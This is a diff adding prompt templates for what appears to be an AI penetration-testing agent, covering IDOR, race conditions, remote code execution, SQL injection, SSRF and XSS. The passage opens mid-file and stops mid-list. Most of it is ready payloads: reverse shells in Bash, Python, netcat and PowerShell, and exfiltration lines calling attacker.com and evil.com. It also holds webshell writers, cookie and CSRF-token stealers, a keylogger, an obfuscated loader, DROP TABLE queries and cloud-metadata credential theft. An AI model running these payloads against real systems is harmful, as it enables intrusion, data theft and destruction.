 Simple increment/decrement:
 /api/user/123 → /api/user/124
 /download?file=report_2024_01.pdf → report_2024_02.pdf
 </direct_access>
 <mass_enumeration>
 Automate ID ranges:
 for i in range(1, 10000):
    /api/user/{i}/data
 </mass_enumeration>
 <type_confusion>
 - String where int expected: "123" vs 123
 - Array where single value expected: [123] vs 123
 - Object injection: {"id": {"$ne": null}}
 </type_confusion>
 </exploitation_techniques>
 <advanced_techniques>
 <uuid_prediction>
 - Time-based UUIDs (version 1): predictable timestamps
 - Weak randomness in version 4
 - Sequential UUID generation
 </uuid_prediction>
 <blind_idor>
 - Side channel: response time, size differences
 - Error message variations
 - Boolean-based: exists vs not exists
 </blind_idor>
 <secondary_idor>
 First get list of IDs, then access:
 /api/users → [123, 456, 789]
 /api/user/789/private-data
 </secondary_idor>
 </advanced_techniques>
 <bypass_techniques>
 <parameter_pollution>
 ?id=123&id=456 (takes last or first?)
 ?user_id=victim&user_id=attacker
 </parameter_pollution>
 <encoding_tricks>
 - URL encode: %31%32%33
 - Double encoding: %25%33%31
 - Unicode: \u0031\u0032\u0033
 </encoding_tricks>
 <case_variation>
 userId vs userid vs USERID vs UserId
 </case_variation>
 <format_switching>
 /api/user.json?id=123
 /api/user.xml?id=123
 /api/user/123.json vs /api/user/123
 </format_switching>
 </bypass_techniques>
 <special_contexts>
 <graphql_idor>
 Query batching and alias abuse:
 query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
 </graphql_idor>
 <websocket_idor>
 Subscribe to other users' channels:
 {"subscribe": "user_456_notifications"}
 </websocket_idor>
 <file_path_idor>
 ../../../other_user/private.pdf
 /files/user_123/../../user_456/data.csv
 </file_path_idor>
 </special_contexts>
 <chaining_attacks>
 - IDOR + XSS: Access and weaponize other users' data
 - IDOR + CSRF: Force actions on discovered objects
 - IDOR + SQLi: Extract all IDs then access
 </chaining_attacks>
 <validation>
 To confirm IDOR:
 1. Access data/function without authorization
 2. Demonstrate data belongs to another user
 3. Show consistent access pattern
 4. Prove it's not intended functionality
 5. Document security impact
 </validation>
 <false_positives>
 NOT IDOR if:
 - Public data by design
 - Proper authorization checks
 - Only affects own resources
 - Rate limiting prevents exploitation
 - Data is sanitized/limited
 </false_positives>
 <impact>
 - Personal data exposure
 - Financial information theft
 - Account takeover
 - Business data leak
 - Compliance violations (GDPR, HIPAA)
 </impact>
 <pro_tips>
 1. Test all ID parameters systematically
 2. Look for patterns in IDs
 3. Check export/download functions
 4. Test different HTTP methods
 5. Monitor for blind IDOR via timing
 6. Check mobile APIs separately
 7. Look for backup/debug endpoints
 8. Test file path traversal
 9. Automate enumeration carefully
 10. Chain with other vulnerabilities
 </pro_tips>
 <remember>IDORs are about broken access control, not just guessable IDs. Even GUIDs can be vulnerable if disclosed elsewhere. Focus on high-impact data access.</remember>
 </idor_vulnerability_guide>
--- a/strix/prompts/vulnerabilities/race_conditions.jinja
+++ b/strix/prompts/vulnerabilities/race_conditions.jinja
@@ -0,0 +1,194 @@
 <race_conditions_guide>
 <title>RACE CONDITIONS - TIME-OF-CHECK TIME-OF-USE (TOCTOU) MASTERY</title>
 <critical>Race conditions lead to financial fraud, privilege escalation, and business logic bypass. Often overlooked but devastating.</critical>
 <high_value_targets>
 - Payment/checkout processes
 - Coupon/discount redemption
 - Account balance operations
 - Voting/rating systems
 - Limited resource allocation
 - User registration (username claims)
 - Password reset flows
 - File upload/processing
 - API rate limits
 - Loyalty points/rewards
 - Stock/inventory management
 - Withdrawal functions
 </high_value_targets>
 <discovery_techniques>
 <identify_race_windows>
 Multi-step processes with gaps between:
 1. Check phase (validation/verification)
 2. Use phase (action execution)
 3. Write phase (state update)
 Look for:
 - "Check balance then deduct"
 - "Verify coupon then apply"
 - "Check inventory then purchase"
 - "Validate token then consume"
 </identify_race_windows>
 <detection_methods>
 - Parallel requests with same data
 - Rapid sequential requests
 - Monitor for inconsistent states
 - Database transaction analysis
 - Response timing variations
 </detection_methods>
 </discovery_techniques>
 <exploitation_tools>
 <turbo_intruder>
 Python script for Burp Suite Turbo Intruder:
 ```python
 def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30,
                          requestsPerConnection=100,
                          pipeline=False)
    for i in range(30):
        engine.queue(target.req, gate='race1')
    engine.openGate('race1')
 ```
 </turbo_intruder>
 <manual_methods>
 - Browser developer tools (multiple tabs)
 - curl with & for background: curl url & curl url &
 - Python asyncio/aiohttp
 - Go routines
 - Node.js Promise.all()
 </manual_methods>
 </exploitation_tools>
 <common_vulnerabilities>
 <financial_races>
 - Double withdrawal
 - Multiple discount applications
 - Balance transfer duplication
 - Payment bypass
 - Cashback multiplication
 </financial_races>
 <authentication_races>
 - Multiple password resets
 - Account creation with same email
 - 2FA bypass
 - Session generation collision
 </authentication_races>
 <resource_races>
 - Inventory depletion bypass
 - Rate limit circumvention
 - File overwrite
 - Token reuse
 </resource_races>
 </common_vulnerabilities>
 <advanced_techniques>
 <single_packet_attack>
 HTTP/2 multiplexing for true simultaneous delivery:
 - All requests in single TCP packet
 - Microsecond precision
 - Bypass even mutex locks
 </single_packet_attack>
 <last_byte_sync>
 Send all but last byte, then:
 1. Hold connections open
 2. Send final byte simultaneously
 3. Achieve nanosecond precision
 </last_byte_sync>
 <connection_warming>
 Pre-establish connections:
 1. Create connection pool
 2. Prime with dummy requests
 3. Send race requests on warm connections
 </connection_warming>
 </advanced_techniques>
 <bypass_techniques>
 <distributed_attacks>
 - Multiple source IPs
 - Different user sessions
 - Varied request headers
 - Geographic distribution
 </distributed_attacks>
 <timing_optimization>
 - Measure server processing time
 - Align requests with server load
 - Exploit maintenance windows
 - Target async operations
 </timing_optimization>
 </bypass_techniques>
 <specific_scenarios>
 <limit_bypass>
 "Limited to 1 per user" → Send N parallel requests
 Results: N successful purchases
 </limit_bypass>
 <balance_manipulation>
 Transfer $100 from account with $100 balance:
 - 10 parallel transfers
 - Each checks balance: $100 available
 - All proceed: -$900 balance
 </balance_manipulation>
 <vote_manipulation>
 Single vote limit:
 - Send multiple vote requests simultaneously
 - All pass validation
 - Multiple votes counted
 </vote_manipulation>
 </specific_scenarios>
 <validation>
 To confirm race condition:
 1. Demonstrate parallel execution success
 2. Show single request fails
 3. Prove timing dependency
 4. Document financial/security impact
 5. Achieve consistent reproduction
 </validation>
 <false_positives>
 NOT a race condition if:
 - Idempotent operations
 - Proper locking mechanisms
 - Atomic database operations
 - Queue-based processing
 - No security impact
 </false_positives>
 <impact>
 - Financial loss (double spending)
 - Resource exhaustion
 - Data corruption
 - Business logic bypass
 - Privilege escalation
 </impact>
 <pro_tips>
 1. Use HTTP/2 for better synchronization
 2. Automate with Turbo Intruder
 3. Test payment flows extensively
 4. Monitor database locks
 5. Try different concurrency levels
 6. Test async operations
 7. Look for compensating transactions
 8. Check mobile app endpoints
 9. Test during high load
 10. Document exact timing windows
 </pro_tips>
 <remember>Modern race conditions require microsecond precision. Focus on financial operations and limited resource allocation. Single-packet attacks are most reliable.</remember>
 </race_conditions_guide>
--- a/strix/prompts/vulnerabilities/rce.jinja
+++ b/strix/prompts/vulnerabilities/rce.jinja
@@ -0,0 +1,222 @@
 <rce_vulnerability_guide>
 <title>REMOTE CODE EXECUTION (RCE) - MASTER EXPLOITATION</title>
 <critical>RCE is the holy grail - complete system compromise. Modern RCE requires sophisticated bypass techniques.</critical>
 <common_injection_contexts>
 - System commands: ping, nslookup, traceroute, whois
 - File operations: upload, download, convert, resize
 - PDF generators: wkhtmltopdf, phantomjs
 - Image processors: ImageMagick, GraphicsMagick
 - Media converters: ffmpeg, sox
 - Archive handlers: tar, zip, 7z
 - Version control: git, svn operations
 - LDAP queries
 - Database backup/restore
 - Email sending functions
 </common_injection_contexts>
 <detection_methods>
 <time_based>
 - Linux/Unix: ;sleep 10 # | sleep 10 # `sleep 10` $(sleep 10)
 - Windows: & ping -n 10 127.0.0.1 & || ping -n 10 127.0.0.1 ||
 - PowerShell: ;Start-Sleep -s 10 #
 </time_based>
 <dns_oob>
 - nslookup $(whoami).attacker.com
 - ping $(hostname).attacker.com
 - curl http://$(cat /etc/passwd | base64).attacker.com
 </dns_oob>
 <output_based>
 - Direct: ;cat /etc/passwd
 - Encoded: ;cat /etc/passwd | base64
 - Hex: ;xxd -p /etc/passwd
 </output_based>
 </detection_methods>
 <command_injection_vectors>
 <basic_payloads>
 ; id
 | id
 || id
 & id
 && id
 `id`
 $(id)
 ${IFS}id
 </basic_payloads>
 <bypass_techniques>
 - Space bypass: ${IFS}, $IFS$9, <, %09 (tab)
 - Blacklist bypass: w'h'o'a'm'i, w"h"o"a"m"i
 - Command substitution: $(a=c;b=at;$a$b /etc/passwd)
 - Encoding: echo 'aWQ=' | base64 -d | sh
 - Case variation: WhOaMi (Windows)
 </bypass_techniques>
 </command_injection_vectors>
 <language_specific_rce>
 <php>
 - eval($_GET['cmd'])
 - system(), exec(), shell_exec(), passthru()
 - preg_replace with /e modifier
 - assert() with string input
 - unserialize() exploitation
 </php>
 <python>
 - eval(), exec()
 - subprocess.call(shell=True)
 - os.system()
 - pickle deserialization
 - yaml.load()
 </python>
 <java>
 - Runtime.getRuntime().exec()
 - ProcessBuilder
 - ScriptEngine eval
 - JNDI injection
 - Expression Language injection
 </java>
 <nodejs>
 - eval()
 - child_process.exec()
 - vm.runInContext()
 - require() pollution
 </nodejs>
 </language_specific_rce>
 <advanced_exploitation>
 <polyglot_payloads>
 Works in multiple contexts:
 ;id;#' |id| #" |id| #
 ${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
 </polyglot_payloads>
 <blind_rce>
 - DNS exfiltration: $(whoami).evil.com
 - HTTP callbacks: curl evil.com/$(id)
 - Time delays for boolean extraction
 - Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
 </blind_rce>
 <chained_exploitation>
 1. Command injection → Write webshell
 2. File upload → LFI → RCE
 3. XXE → SSRF → internal RCE
 4. SQLi → INTO OUTFILE → RCE
 </chained_exploitation>
 </advanced_exploitation>
 <specific_contexts>
 <imagemagick>
 push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://evil.com/image.jpg"|id > /tmp/output")'
 pop graphic-context
 </imagemagick>
 <ghostscript>
 %!PS
 /outfile (%pipe%id) (w) file def
 </ghostscript>
 <ffmpeg>
 #EXTM3U
 #EXT-X-TARGETDURATION:1
 #EXTINF:1.0,
 concat:|file:///etc/passwd
 </ffmpeg>
 <latex>
 \immediate\write18{id > /tmp/pwn}
 \input{|"cat /etc/passwd"}
 </latex>
 </specific_contexts>
 <container_escapes>
 <docker>
 - Privileged containers: mount host filesystem
 - Docker.sock exposure
 - Kernel exploits
 - /proc/self/exe overwrite
 </docker>
 <kubernetes>
 - Service account tokens
 - Kubelet API access
 - Container breakout to node
 </kubernetes>
 </container_escapes>
 <waf_bypasses>
 - Unicode normalization
 - Double URL encoding
 - Case variation mixing
 - Null bytes: %00
 - Comments: /**/i/**/d
 - Alternative commands: hostname vs uname -n
 - Path traversal: /usr/bin/id vs id
 </waf_bypasses>
 <post_exploitation>
 <reverse_shells>
 Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
 Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
 Netcat: nc -e /bin/sh attacker 4444
 PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 </reverse_shells>
 <persistence>
 - Cron jobs
 - SSH keys
 - Web shells
 - Systemd services
 </persistence>
 </post_exploitation>
 <validation>
 To confirm RCE:
 1. Execute unique command (id, hostname)
 2. Demonstrate file system access
 3. Show command output retrieval
 4. Achieve reverse shell
 5. Prove consistent execution
 </validation>
 <false_positives>
 NOT RCE if:
 - Only crashes application
 - Limited to specific commands
 - Sandboxed/containerized properly
 - No actual command execution
 - Output not retrievable
 </false_positives>
 <impact>
 - Complete system compromise
 - Data exfiltration
 - Lateral movement
 - Backdoor installation
 - Service disruption
 </impact>
 <pro_tips>
 1. Try all delimiters: ; | || & &&
 2. Test both Unix and Windows commands
 3. Use time-based for blind confirmation
 4. Chain with other vulnerabilities
 5. Check sudo permissions post-exploit
 6. Look for SUID binaries
 7. Test command substitution variants
 8. Monitor DNS for blind RCE
 9. Try polyglot payloads first
 10. Document full exploitation path
 </pro_tips>
 <remember>Modern RCE often requires chaining vulnerabilities and bypassing filters. Focus on blind techniques, WAF bypasses, and achieving stable shells. Always test in the specific context - ImageMagick RCE differs from command injection.</remember>
 </rce_vulnerability_guide>
--- a/strix/prompts/vulnerabilities/sql_injection.jinja
+++ b/strix/prompts/vulnerabilities/sql_injection.jinja
@@ -0,0 +1,216 @@
 <sql_injection_guide>
 <title>SQL INJECTION - MASTER CLASS TECHNIQUES</title>
 <critical>SQL Injection = direct database access = game over.</critical>
 <injection_points>
 - URL parameters: ?id=1
 - POST body parameters
 - HTTP headers: User-Agent, Referer, X-Forwarded-For
 - Cookie values
 - JSON/XML payloads
 - File upload names
 - Session identifiers
 </injection_points>
 <detection_techniques>
 - Time-based: ' AND SLEEP(5)--
 - Boolean-based: ' AND '1'='1 vs ' AND '1'='2
 - Error-based: ' (provoke verbose errors)
 - Out-of-band: DNS/HTTP callbacks
 - Differential response: content length changes
 - Second-order: stored and triggered later
 </detection_techniques>
 <uncommon_contexts>
 - ORDER BY: (CASE WHEN condition THEN 1 ELSE 2 END)
 - GROUP BY: GROUP BY id HAVING 1=1--
 - INSERT: INSERT INTO users VALUES (1,'admin',(SELECT password FROM admins))--
 - UPDATE: UPDATE users SET email=(SELECT @@version) WHERE id=1
 - Functions: WHERE MATCH(title) AGAINST((SELECT password FROM users LIMIT 1))
 </uncommon_contexts>
 <basic_payloads>
 <union_based>
 ' UNION SELECT null--
 ' UNION SELECT null,null--
 ' UNION SELECT 1,2,3--
 ' UNION SELECT 1,@@version,3--
 ' UNION ALL SELECT 1,database(),3--
 </union_based>
 <error_based>
 ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
 ' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
 ' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
 </error_based>
 <blind_boolean>
 ' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
 ' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--
 ' AND (SELECT COUNT(*) FROM users)>5--
 </blind_boolean>
 <blind_time>
 ' AND IF(1=1,SLEEP(5),0)--
 ' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
 '; WAITFOR DELAY '0:0:5'-- (MSSQL)
 '; SELECT pg_sleep(5)-- (PostgreSQL)
 </blind_time>
 </basic_payloads>
 <advanced_techniques>
 <stacked_queries>
 '; DROP TABLE users--
 '; INSERT INTO admins VALUES ('hacker','password')--
 '; UPDATE users SET password='hacked' WHERE username='admin'--
 </stacked_queries>
 <out_of_band>
 MySQL:
 ' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
 ' UNION SELECT LOAD_FILE('/etc/passwd')--
 MSSQL:
 '; EXEC xp_dirtree '\\attacker.com\share'--
 '; EXEC xp_cmdshell 'nslookup attacker.com'--
 PostgreSQL:
 '; CREATE EXTENSION dblink; SELECT dblink_connect('host=attacker.com')--
 </out_of_band>
 <file_operations>
 MySQL:
 ' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
 ' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
 MSSQL:
 '; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
 PostgreSQL:
 '; CREATE TABLE test(data text); COPY test FROM '/etc/passwd'--
 </file_operations>
 </advanced_techniques>
 <filter_bypasses>
 <space_bypass>
 - Comments: /**/
 - Parentheses: UNION(SELECT)
 - Backticks: UNION`SELECT`
 - Newlines: %0A, %0D
 - Tabs: %09
 </space_bypass>
 <keyword_bypass>
 - Case variation: UnIoN SeLeCt
 - Comments: UN/**/ION SE/**/LECT
 - Encoding: %55nion %53elect
 - Double words: UNUNIONION SESELECTLECT
 </keyword_bypass>
 <waf_bypasses>
 - HTTP Parameter Pollution: id=1&id=' UNION SELECT
 - JSON/XML format switching
 - Chunked encoding
 - Unicode normalization
 - Scientific notation: 1e0 UNION SELECT
 </waf_bypasses>
 </filter_bypasses>
 <specific_databases>
 <mysql>
 - Version: @@version
 - Database: database()
 - User: user(), current_user()
 - Tables: information_schema.tables
 - Columns: information_schema.columns
 </mysql>
 <mssql>
 - Version: @@version
 - Database: db_name()
 - User: user_name(), system_user
 - Tables: sysobjects WHERE xtype='U'
 - Enable xp_cmdshell: sp_configure 'xp_cmdshell',1;RECONFIGURE
 </mssql>
 <postgresql>
 - Version: version()
 - Database: current_database()
 - User: current_user
 - Tables: pg_tables
 - Command execution: CREATE EXTENSION
 </postgresql>
 <oracle>
 - Version: SELECT banner FROM v$version
 - Database: SELECT ora_database_name FROM dual
 - User: SELECT user FROM dual
 - Tables: all_tables
 </oracle>
 </specific_databases>
 <nosql_injection>
 <mongodb>
 {"username": {"$ne": null}, "password": {"$ne": null}}
 {"$where": "this.username == 'admin'"}
 {"username": {"$regex": "^admin"}}
 </mongodb>
 <graphql>
 {users(where:{OR:[{id:1},{id:2}]}){id,password}}
 {__schema{types{name,fields{name}}}}
 </graphql>
 </nosql_injection>
 <automation>
 SQLMap flags:
 - Risk/Level: --risk=3 --level=5
 - Bypass WAF: --tamper=space2comment,between
 - OS Shell: --os-shell
 - Database dump: --dump-all
 - Specific technique: --technique=T (time-based)
 </automation>
 <validation>
 To confirm SQL injection:
 1. Demonstrate database version extraction
 2. Show database/table enumeration
 3. Extract actual data
 4. Prove query manipulation
 5. Document consistent exploitation
 </validation>
 <false_positives>
 NOT SQLi if:
 - Only generic errors
 - No time delays work
 - Same response for all payloads
 - Parameterized queries properly used
 - Input validation effective
 </false_positives>
 <impact>
 - Database content theft
 - Authentication bypass
 - Data manipulation
 - Command execution (xp_cmdshell)
 - File system access
 - Complete database takeover
 </impact>
 <pro_tips>
 1. Always try UNION SELECT first
 2. Use sqlmap for automation
 3. Test all HTTP headers
 4. Try different encodings
 5. Check for second-order SQLi
 6. Test JSON/XML parameters
 7. Look for error messages
 8. Try time-based for blind
 9. Check INSERT/UPDATE contexts
 10. Focus on data extraction
 </pro_tips>
 <remember>Modern SQLi requires bypassing WAFs and dealing with complex queries. Focus on extracting sensitive data - passwords, API keys, PII. Time-based blind SQLi works when nothing else does.</remember>
 </sql_injection_guide>
--- a/strix/prompts/vulnerabilities/ssrf.jinja
+++ b/strix/prompts/vulnerabilities/ssrf.jinja
@@ -0,0 +1,168 @@
 <ssrf_vulnerability_guide>
 <title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
 <critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
 <common_injection_points>
 - URL parameters: url=, link=, path=, src=, href=, uri=
 - File import/export features
 - Webhooks and callbacks
 - PDF generators (wkhtmltopdf)
 - Image processing (ImageMagick)
 - Document parsers
 - Payment gateways (IPN callbacks)
 - Social media card generators
 - URL shorteners/expanders
 </common_injection_points>
 <hidden_contexts>
 - Referer headers in analytics
 - Link preview generation
 - RSS/Feed fetchers
 - Repository cloning (Git/SVN)
 - Package managers (npm, pip)
 - Calendar invites (ICS files)
 - OAuth redirect_uri
 - SAML endpoints
 - GraphQL field resolvers
 </hidden_contexts>
 <cloud_metadata>
 <aws>
 Legacy: http://169.254.169.254/latest/meta-data/
 IMDSv2: Requires token but check if app proxies headers
 Key targets: /iam/security-credentials/, /user-data/
 </aws>
 <google_cloud>
 http://metadata.google.internal/computeMetadata/v1/
 Requires: Metadata-Flavor: Google header
 Target: /instance/service-accounts/default/token
 </google_cloud>
 <azure>
 http://169.254.169.254/metadata/instance?api-version=2021-02-01
 Requires: Metadata: true header
 OAuth: /metadata/identity/oauth2/token
 </azure>
 </cloud_metadata>
 <internal_services>
 <port_scanning>
 Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
 </port_scanning>
 <service_fingerprinting>
 - Elasticsearch: http://localhost:9200/_cat/indices
 - Redis: dict://localhost:6379/INFO
 - MongoDB: http://localhost:27017/test
 - Docker: http://localhost:2375/v1.24/containers/json
 - Kubernetes: https://kubernetes.default.svc/api/v1/
 </service_fingerprinting>
 </internal_services>
 <protocol_exploitation>
 <gopher>
 Redis RCE, SMTP injection, FastCGI exploitation
 </gopher>
 <file>
 file:///etc/passwd, file:///proc/self/environ
 </file>
 <dict>
 dict://localhost:11211/stat (Memcached)
 </dict>
 </protocol_exploitation>
 <bypass_techniques>
 <dns_rebinding>
 First request → your server, second → 127.0.0.1
 </dns_rebinding>
 <encoding_tricks>
 - Decimal IP: http://2130706433/ (127.0.0.1)
 - Octal: http://0177.0.0.1/
 - Hex: http://0x7f.0x0.0x0.0x1/
 - IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
 </encoding_tricks>
 <url_parser_confusion>
 - Authority: http://expected@evil/
 - Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
 </url_parser_confusion>
 <redirect_chains>
 302 → yourserver.com → 169.254.169.254
 </redirect_chains>
 </bypass_techniques>
 <advanced_techniques>
 <blind_ssrf>
 - DNS exfiltration: http://$(hostname).attacker.com/
 - Timing attacks for network mapping
 - Error-based detection
 </blind_ssrf>
 <ssrf_to_rce>
 - Redis: gopher://localhost:6379/ (cron injection)
 - Memcached: gopher://localhost:11211/
 - FastCGI: gopher://localhost:9000/
 </ssrf_to_rce>
 </advanced_techniques>
 <filter_bypasses>
 <localhost>
 127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
 </localhost>
 <parser_differentials>
 http://evil.com#@good.com/, http:evil.com
 </parser_differentials>
 <protocols>
 dict://, gopher://, ftp://, file://, jar://, netdoc://
 </protocols>
 </filter_bypasses>
 <validation_techniques>
 To confirm SSRF:
 1. External callbacks (DNS/HTTP)
 2. Internal network access (different responses)
 3. Time-based detection (timeouts)
 4. Cloud metadata retrieval
 5. Protocol differentiation
 </validation_techniques>
 <false_positive_indicators>
 NOT SSRF if:
 - Only client-side redirects
 - Whitelist properly blocking
 - Generic errors for all URLs
 - No outbound requests made
 - Same-origin policy enforced
 </false_positive_indicators>
 <impact_demonstration>
 - Cloud credential theft (AWS/GCP/Azure)
 - Internal admin panel access
 - Port scanning results
 - SSRF to RCE chain
 - Data exfiltration
 </impact_demonstration>
 <pro_tips>
 1. Always check cloud metadata first
 2. Chain with other vulns (SSRF + XXE)
 3. Use time delays for blind SSRF
 4. Try all protocols, not just HTTP
 5. Automate internal network scanning
 6. Check parser quirks (language-specific)
 7. Monitor DNS for blind confirmation
 8. Try IPv6 (often forgotten)
 9. Abuse redirects for filter bypass
 10. SSRF can be in any URL-fetching feature
 </pro_tips>
 <remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
 </ssrf_vulnerability_guide>
--- a/strix/prompts/vulnerabilities/xss.jinja
+++ b/strix/prompts/vulnerabilities/xss.jinja
@@ -0,0 +1,221 @@
 <xss_vulnerability_guide>
 <title>CROSS-SITE SCRIPTING (XSS) - ADVANCED EXPLOITATION</title>
 <critical>XSS leads to account takeover, data theft, and complete client-side compromise. Modern XSS requires sophisticated bypass techniques.</critical>
 <injection_points>
 - URL parameters: ?search=, ?q=, ?name=
 - Form inputs: text, textarea, hidden fields
 - Headers: User-Agent, Referer, X-Forwarded-For
 - Cookies (if reflected)
 - File uploads (filename, metadata)
 - JSON endpoints: {"user":"<payload>"}
 - postMessage handlers
 - DOM properties: location.hash, document.referrer
 - WebSocket messages
 - PDF/document generators
 </injection_points>
 <basic_detection>
 <reflection_testing>
 Simple: <random123>
 HTML: <h1>test</h1>
 Script: <script>alert(1)</script>
 Event: <img src=x onerror=alert(1)>
 Protocol: javascript:alert(1)
 </reflection_testing>
 <encoding_contexts>
 - HTML: <>&"'
 - Attribute: "'<>&
 - JavaScript: "'\/\n\r\t
 - URL: %3C%3E%22%27
 - CSS: ()'";{}
 </encoding_contexts>
 </basic_detection>
 <filter_bypasses>
 <tag_event_bypasses>
 <svg onload=alert(1)>
 <body onpageshow=alert(1)>
 <marquee onstart=alert(1)>
 <details open ontoggle=alert(1)>
 <audio src onloadstart=alert(1)>
 <video><source onerror=alert(1)>
 <select autofocus onfocus=alert(1)>
 <textarea autofocus>/*</textarea><svg/onload=alert(1)>
 <keygen autofocus onfocus=alert(1)>
 <frameset onload=alert(1)>
 </tag_event_bypasses>
 <string_bypass>
 - Concatenation: 'al'+'ert'
 - Comments: /**/alert/**/
 - Template literals: `ale${`rt`}`
 - Unicode: \u0061lert
 - Hex: \x61lert
 - Octal: \141lert
 - HTML entities: &apos;alert&apos;
 - Double encoding: %253Cscript%253E
 - Case variation: <ScRiPt>
 </string_bypass>
 <parentheses_bypass>
 alert`1`
 setTimeout`alert\x281\x29`
 [].map.call`1${alert}2`
 onerror=alert;throw 1
 onerror=alert,throw 1
 onerror=alert(1)//
 </parentheses_bypass>
 <keyword_bypass>
 - Proxy: window['al'+'ert']
 - Base64: atob('YWxlcnQ=')
 - Hex: eval('\x61\x6c\x65\x72\x74')
 - Constructor: [].constructor.constructor('alert(1)')()
 - JSFuck: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]...
 </keyword_bypass>
 </filter_bypasses>
 <advanced_techniques>
 <dom_xss>
 - Sinks: innerHTML, document.write, eval, setTimeout
 - Sources: location.hash, location.search, document.referrer
 - Example: element.innerHTML = location.hash
 - Exploit: #<img src=x onerror=alert(1)>
 </dom_xss>
 <mutation_xss>
 <noscript><p title="</noscript><img src=x onerror=alert(1)>">
 <form><button formaction=javascript:alert(1)>
 </mutation_xss>
 <polyglot_xss>
 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 </polyglot_xss>
 <csp_bypasses>
 - JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
 - AngularJS: {{constructor.constructor('alert(1)')()}}
 - Script gadgets in allowed libraries
 - Base tag injection: <base href="//evil.com/">
 - Object/embed: <object data="data:text/html,<script>alert(1)</script>">
 </csp_bypasses>
 </advanced_techniques>
 <exploitation_payloads>
 <cookie_theft>
 <script>fetch('//evil.com/steal?c='+document.cookie)</script>
 <img src=x onerror="this.src='//evil.com/steal?c='+document.cookie">
 new Image().src='//evil.com/steal?c='+document.cookie
 </cookie_theft>
 <keylogger>
 document.onkeypress=e=>fetch('//evil.com/key?k='+e.key)
 </keylogger>
 <phishing>
 document.body.innerHTML='<form action=//evil.com/phish><input name=pass><input type=submit></form>'
 </phishing>
 <csrf_token_theft>
 fetch('/api/user').then(r=>r.text()).then(d=>fetch('//evil.com/token?t='+d.match(/csrf_token":"([^"]+)/)[1]))
 </csrf_token_theft>
 <webcam_mic_access>
 navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
 </webcam_mic_access>
 </exploitation_payloads>
 <special_contexts>
 <pdf_generation>
 - JavaScript in links: <a href="javascript:app.alert(1)">
 - Form actions: <form action="javascript:...">
 </pdf_generation>
 <email_clients>
 - Limited tags: <a>, <img>, <style>
 - CSS injection: <style>@import'//evil.com/css'</style>
 </email_clients>
 <markdown>
 [Click](javascript:alert(1))
 ![a](x"onerror="alert(1))
 </markdown>
 <react_vue>
 - dangerouslySetInnerHTML={{__html: payload}}
 - v-html directive bypass
 </react_vue>
 <file_upload_xss>
 - SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
 - HTML files
 - XML with XSLT
 - MIME type confusion
 </file_upload_xss>
 </special_contexts>
 <blind_xss>
 <detection>
 - Out-of-band callbacks
 - Service workers for persistence
 - Polyglot payloads for multiple contexts
 </detection>
 <payloads>
 '"><script src=//evil.com/blindxss.js></script>
 '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vZXZpbC5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
 </payloads>
 </blind_xss>
 <waf_bypasses>
 <encoding>
 - HTML: &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
 - URL: %3Cscript%3E
 - Unicode: \u003cscript\u003e
 - Mixed: <scr\x69pt>
 </encoding>
 <obfuscation>
 <a href="j&#x61;vascript:alert(1)">
 <img src=x onerror="\u0061\u006C\u0065\u0072\u0074(1)">
 <svg/onload=eval(atob('YWxlcnQoMSk='))>
 </obfuscation>
 <browser_bugs>
 - Chrome: <svg><script>alert&lpar;1&rpar;
 - Firefox specific payloads
 - IE/Edge compatibility
 </browser_bugs>
 </waf_bypasses>
 <impact_demonstration>
 1. Account takeover via cookie/token theft
 2. Defacement proof
 3. Keylogging demonstration
